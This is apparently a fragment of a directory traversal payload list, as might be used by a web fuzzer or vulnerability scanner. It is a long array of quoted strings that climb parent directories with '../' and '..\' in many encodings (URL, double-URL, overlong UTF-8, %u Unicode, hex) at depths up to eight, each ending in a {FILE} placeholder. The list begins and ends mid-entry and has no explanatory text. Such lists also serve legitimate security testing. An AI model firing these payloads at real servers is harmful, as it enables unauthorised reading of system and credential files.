25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","..%%32%66{FILE}","..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","..%%35%63{FILE}","..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%5c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%5c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","\\../{FILE}","\\../\\../{FILE}","\\../\\../\\../{FILE}","\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../\\../{FILE}","/..\\{FILE}","/..\\/..\\{FILE}","/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",".../{FILE}",".../.../{FILE}",".../.../.../{FILE}",".../.../.../.../{FILE}",".../.../.../.../.../{FILE}",".../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../.../{FILE}","...\\{FILE}","...\\...\\{FILE}","...\\...\\...\\{FILE}","...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\...\\{FILE}","..../{FILE}","..../..../{FILE}","..../..../..../{FILE}","..../..../..../..../{FILE}","..../..../..../..../..../{FILE}","..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../..../{FILE}","....\\{FILE}","....\\....\\{FILE}","....\\....\\....\\{FILE}","....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\....\\{FILE}","........................................................................../{FILE}","........................................................................../../{FILE}","........................................................................../../../{FILE}","........................................................................../../../../{FILE}","........................................................................../../../../../{FILE}","........................................................................../../../../../../{FILE}","........................................................................../../../../../../../{FILE}","........................................................................../../../../../../../../{FILE}","..........................................................................\\{FILE}","..........................................................................\\..\\{FILE}","..........................................................................\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%u2215{FILE}","..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","..%u2216{FILE}","..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%uEFC8{FILE}","..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uF025{FILE}","..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","..0x2f{FILE}","..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0